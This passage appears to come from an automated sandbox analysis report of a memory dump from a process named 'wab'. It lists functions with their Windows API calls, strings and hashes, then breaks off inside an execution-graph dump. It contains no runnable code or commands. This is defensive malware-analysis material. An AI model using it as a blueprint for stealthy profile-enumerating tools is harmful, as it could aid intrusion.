                                                                                              • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memcpy.MSVCRT ref: 004134E0
                                                                                              • memcpy.MSVCRT ref: 004134F2
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                              • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$DialogHandleModuleParam
                                                                                              • String ID:
                                                                                              • API String ID: 1386444988-0
                                                                                              • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                              • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                              • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                              • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                              • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                              • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                              • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                              • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: InvalidateMessageRectSend
                                                                                              • String ID: d=E
                                                                                              • API String ID: 909852535-3703654223
                                                                                              • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                              • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                              • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                              • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • wcschr.MSVCRT ref: 0040F79E
                                                                                              • wcschr.MSVCRT ref: 0040F7AC
                                                                                                • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcschr$memcpywcslen
                                                                                              • String ID: "
                                                                                              • API String ID: 1983396471-123907689
                                                                                              • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                              • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                              • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                              • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                              • _memicmp.MSVCRT ref: 0040C00D
                                                                                              • memcpy.MSVCRT ref: 0040C024
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer_memicmpmemcpy
                                                                                              • String ID: URL
                                                                                              • API String ID: 2108176848-3574463123
                                                                                              • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                              • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                              • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                              • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _snwprintfmemcpy
                                                                                              • String ID: %2.2X
                                                                                              • API String ID: 2789212964-323797159
                                                                                              • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                              • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                              • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                              • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _snwprintf
                                                                                              • String ID: %%-%d.%ds
                                                                                              • API String ID: 3988819677-2008345750
                                                                                              • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                              • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                              • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                              • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040E770
                                                                                              • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendmemset
                                                                                              • String ID: F^@
                                                                                              • API String ID: 568519121-3652327722
                                                                                              • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                              • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                              • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                              • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: PlacementWindowmemset
                                                                                              • String ID: WinPos
                                                                                              • API String ID: 4036792311-2823255486
                                                                                              • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                              • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                              • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                              • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                              • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                              • wcscat.MSVCRT ref: 0040DCFF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileModuleNamewcscatwcsrchr
                                                                                              • String ID: _lng.ini
                                                                                              • API String ID: 383090722-1948609170
                                                                                              • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                              • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                              • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                              • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                              • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                              • API String ID: 2773794195-880857682
                                                                                              • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                              • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                              • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                              • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memset
                                                                                              • String ID:
                                                                                              • API String ID: 438689982-0
                                                                                              • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                              • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                              • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                              • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@$memset
                                                                                              • String ID:
                                                                                              • API String ID: 1860491036-0
                                                                                              • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                              • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                              • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                              • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memcmp.MSVCRT ref: 00408AF3
                                                                                                • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                                                              • memcmp.MSVCRT ref: 00408B2B
                                                                                              • memcmp.MSVCRT ref: 00408B5C
                                                                                              • memcpy.MSVCRT ref: 00408B79
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcmp$memcpy
                                                                                              • String ID:
                                                                                              • API String ID: 231171946-0
                                                                                              • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                              • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                              • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                              • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcslen$wcscat$wcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 1961120804-0
                                                                                              • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                              • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                              • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                              • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:2.3%
                                                                                              Dynamic/Decrypted Code Coverage:20.8%
                                                                                              Signature Coverage:0.5%
                                                                                              Total number of Nodes:831
                                                                                              Total number of Limit Nodes:16
                                                                                              execution_graph 33807 40fc40 70 API calls 33980 403640 21 API calls 33808 427fa4 42 API calls 33981 412e43 _endthreadex 33982 425115 76 API calls __fprintf_l 33983 43fe40 133 API calls 33811 425115 83 API calls __fprintf_l 33812 401445 memcpy memcpy DialogBoxParamA 33813 440c40 34 API calls 32939 444c4a 32958 444e38 32939->32958 32941 444c56 GetModuleHandleA 32942 444c68 __set_app_type __p__fmode __p__commode 32941->32942 32944 444cfa 32942->32944 32945 444d02 __setusermatherr 32944->32945 32946 444d0e 32944->32946 32945->32946 32959 444e22 _controlfp 32946->32959 32948 444d13 _initterm __getmainargs _initterm 32949 444d6a GetStartupInfoA 32948->32949 32951 444d9e GetModuleHandleA 32949->32951 32960 40cf44 32951->32960 32955 444dcf _cexit 32957 444e04 32955->32957 32956 444dc8 exit 32956->32955 32958->32941 32959->32948 33011 404a99 LoadLibraryA 32960->33011 32962 40cf60 32997 40cf64 32962->32997 33018 410d0e 32962->33018 32964 40cf6f 33022 40ccd7 ??2@YAPAXI 32964->33022 32966 40cf9b 33036 407cbc 32966->33036 32971 40cfc4 33054 409825 memset 32971->33054 32972 40cfd8 33059 4096f4 memset 32972->33059 32977 40d181 ??3@YAXPAX 32979 40d1b3 32977->32979 32980 40d19f DeleteObject 32977->32980 32978 407e30 _strcmpi 32981 40cfee 32978->32981 33083 407948 ??3@YAXPAX ??3@YAXPAX 32979->33083 32980->32979 32983 40cff2 RegDeleteKeyA 32981->32983 32984 40d007 EnumResourceTypesA 32981->32984 32983->32977 32986 40d047 32984->32986 32987 40d02f MessageBoxA 32984->32987 32985 40d1c4 33084 4080d4 ??3@YAXPAX 32985->33084 32989 40d0a0 CoInitialize 32986->32989 33064 40ce70 32986->33064 32987->32977 33081 40cc26 strncat memset RegisterClassA CreateWindowExA 32989->33081 32991 40d1cd 33085 407948 ??3@YAXPAX ??3@YAXPAX 32991->33085 32993 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33082 40c256 PostMessageA 32993->33082 32997->32955 32997->32956 32998 40d061 ??3@YAXPAX 32998->32979 33001 40d084 DeleteObject 32998->33001 32999 40d09e 32999->32989 33001->32979 33003 40d0f9 GetMessageA 33004 40d17b 33003->33004 33005 40d10d 33003->33005 33004->32977 33006 40d113 TranslateAccelerator 33005->33006 33008 40d145 IsDialogMessage 33005->33008 33009 40d139 IsDialogMessage 33005->33009 33006->33005 33007 40d16d GetMessageA 33006->33007 33007->33004 33007->33006 33008->33007 33010 40d157 TranslateMessage DispatchMessageA 33008->33010 33009->33007 33009->33008 33010->33007 33012 404ac4 GetProcAddress 33011->33012 33015 404ae8 33011->33015 33013 404ad4 33012->33013 33014 404add FreeLibrary 33012->33014 33013->33014 33014->33015 33016 404b13 33015->33016 33017 404afc MessageBoxA 33015->33017 33016->32962 33017->32962 33019 410d17 LoadLibraryA 33018->33019 33020 410d3c 33018->33020 33019->33020 33021 410d2b GetProcAddress 33019->33021 33020->32964 33021->33020 33023 40cd08 ??2@YAPAXI 33022->33023 33025 40cd26 33023->33025 33026 40cd2d 33023->33026 33093 404025 6 API calls 33025->33093 33028 40cd66 33026->33028 33029 40cd59 DeleteObject 33026->33029 33086 407088 33028->33086 33029->33028 33031 40cd6b 33089 4019b5 33031->33089 33034 4019b5 strncat 33035 40cdbf _mbscpy 33034->33035 33035->32966 33095 407948 ??3@YAXPAX ??3@YAXPAX 33036->33095 33038 407cf7 33041 407a1f malloc memcpy ??3@YAXPAX ??3@YAXPAX 33038->33041 33042 407ddc 33038->33042 33044 407d7a ??3@YAXPAX 33038->33044 33049 407e04 33038->33049 33099 40796e 7 API calls 33038->33099 33100 406f30 33038->33100 33041->33038 33042->33049 33108 407a1f 33042->33108 33044->33038 33096 407a55 33049->33096 33050 407e30 33051 407e57 33050->33051 33052 407e38 33050->33052 33051->32971 33051->32972 33052->33051 33053 407e41 _strcmpi 33052->33053 33053->33051 33053->33052 33114 4097ff 33054->33114 33056 409854 33119 409731 33056->33119 33060 4097ff 3 API calls 33059->33060 33061 409723 33060->33061 33139 40966c 33061->33139 33153 4023b2 33064->33153 33070 40ced3 33242 40cdda 7 API calls 33070->33242 33071 40cece 33075 40cf3f 33071->33075 33194 40c3d0 memset GetModuleFileNameA strrchr 33071->33194 33075->32998 33075->32999 33077 40ceed 33221 40affa 33077->33221 33081->32993 33082->33003 33083->32985 33084->32991 33085->32997 33094 406fc7 memset _mbscpy 33086->33094 33088 40709f CreateFontIndirectA 33088->33031 33090 4019e1 33089->33090 33091 4019c2 strncat 33090->33091 33092 4019e5 memset LoadIconA 33090->33092 33091->33090 33092->33034 33093->33026 33094->33088 33095->33038 33097 407a65 33096->33097 33098 407a5b ??3@YAXPAX 33096->33098 33097->33050 33098->33097 33099->33038 33101 406f37 malloc 33100->33101 33102 406f7d 33100->33102 33104 406f73 33101->33104 33105 406f58 33101->33105 33102->33038 33104->33038 33106 406f6c ??3@YAXPAX 33105->33106 33107 406f5c memcpy 33105->33107 33106->33104 33107->33106 33109 407a38 33108->33109 33110 407a2d ??3@YAXPAX 33108->33110 33112 406f30 3 API calls 33109->33112 33111 407a43 33110->33111 33113 40796e 7 API calls 33111->33113 33112->33111 33113->33049 33130 406f96 GetModuleFileNameA 33114->33130 33116 409805 strrchr 33117 409814 33116->33117 33118 409817 _mbscat 33116->33118 33117->33118 33118->33056 33131 44b090 33119->33131 33124 40930c 3 API calls 33125 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33124->33125 33126 4097c5 LoadStringA 33125->33126 33127 4097db 33126->33127 33127->33126 33129 4097f3 33127->33129 33138 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33127->33138 33129->32977 33130->33116 33132 40973e _mbscpy _mbscpy 33131->33132 33133 40930c 33132->33133 33134 44b090 33133->33134 33135 409319 memset GetPrivateProfileStringA 33134->33135 33136 409374 33135->33136 33137 409364 WritePrivateProfileStringA 33135->33137 33136->33124 33137->33136 33138->33127 33149 406f81 GetFileAttributesA 33139->33149 33141 409675 33142 4096ee 33141->33142 33143 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33141->33143 33142->32978 33150 409278 GetPrivateProfileStringA 33143->33150 33145 4096c9 33151 409278 GetPrivateProfileStringA 33145->33151 33147 4096da 33152 409278 GetPrivateProfileStringA 33147->33152 33149->33141 33150->33145 33151->33147 33152->33142 33244 409c1c 33153->33244 33156 401e69 memset 33283 410dbb 33156->33283 33159 401ec2 33313 4070e3 strlen _mbscat _mbscpy _mbscat 33159->33313 33160 401ed4 33298 406f81 GetFileAttributesA 33160->33298 33163 401ee6 strlen strlen 33165 401f15 33163->33165 33166 401f28 33163->33166 33314 4070e3 strlen _mbscat _mbscpy _mbscat 33165->33314 33299 406f81 GetFileAttributesA 33166->33299 33169 401f35 33300 401c31 33169->33300 33172 401f75 33312 410a9c RegOpenKeyExA 33172->33312 33174 401c31 7 API calls 33174->33172 33175 401f91 33176 402187 33175->33176 33177 401f9c memset 33175->33177 33179 402195 ExpandEnvironmentStringsA 33176->33179 33180 4021a8 _strcmpi 33176->33180 33315 410b62 RegEnumKeyExA 33177->33315 33324 406f81 GetFileAttributesA 33179->33324 33180->33070 33180->33071 33182 40217e RegCloseKey 33182->33176 33183 401fd9 atoi 33184 401fef memset memset sprintf 33183->33184 33192 401fc9 33183->33192 33316 410b1e 33184->33316 33187 402165 33187->33182 33188 402076 memset memset strlen strlen 33188->33192 33189 4020dd strlen strlen 33189->33192 33190 4070e3 strlen _mbscat _mbscpy _mbscat 33190->33192 33191 406f81 GetFileAttributesA 33191->33192 33192->33182 33192->33183 33192->33187 33192->33188 33192->33189 33192->33190 33192->33191 33193 402167 _mbscpy 33192->33193 33323 410b62 RegEnumKeyExA 33192->33323 33193->33182 33195 40c422 33194->33195 33196 40c425 _mbscat _mbscpy _mbscpy 33194->33196 33195->33196 33197 40c49d 33196->33197 33198 40c512 33197->33198 33199 40c502 GetWindowPlacement 33197->33199 33200 40c538 33198->33200 33345 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33198->33345 33199->33198 33338 409b31 33200->33338 33204 40ba28 33205 40ba87 33204->33205 33209 40ba3c 33204->33209 33348 406c62 LoadCursorA SetCursor 33205->33348 33207 40ba8c 33349 404734 33207->33349 33357 403c16 33207->33357 33433 404785 33207->33433 33436 410a9c RegOpenKeyExA 33207->33436 33437 4107f1 33207->33437 33208 40ba43 _mbsicmp 33208->33209 33209->33205 33209->33208 33440 40b5e5 10 API calls 33209->33440 33210 40baa0 33211 407e30 _strcmpi 33210->33211 33212 40bab0 33211->33212 33213 40bafa SetCursor 33212->33213 33215 40baf1 qsort 33212->33215 33213->33077 33215->33213 33800 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33221->33800 33223 40b00e 33224 40b016 33223->33224 33225 40b01f GetStdHandle 33223->33225 33801 406d1a CreateFileA 33224->33801 33227 40b01c 33225->33227 33228 40b035 33227->33228 33229 40b12d 33227->33229 33802 406c62 LoadCursorA SetCursor 33228->33802 33806 406d77 9 API calls 33229->33806 33232 40b136 33243 40c580 28 API calls 33232->33243 33233 40b087 33240 40b0a1 33233->33240 33804 40a699 12 API calls 33233->33804 33234 40b042 33234->33233 33234->33240 33803 40a57c strlen WriteFile 33234->33803 33237 40b0d6 33238 40b116 CloseHandle 33237->33238 33239 40b11f SetCursor 33237->33239 33238->33239 33239->33232 33240->33237 33805 406d77 9 API calls 33240->33805 33242->33071 33243->33075 33256 409a32 33244->33256 33247 409c80 memcpy memcpy 33252 409cda 33247->33252 33248 409d18 ??2@YAPAXI ??2@YAPAXI 33250 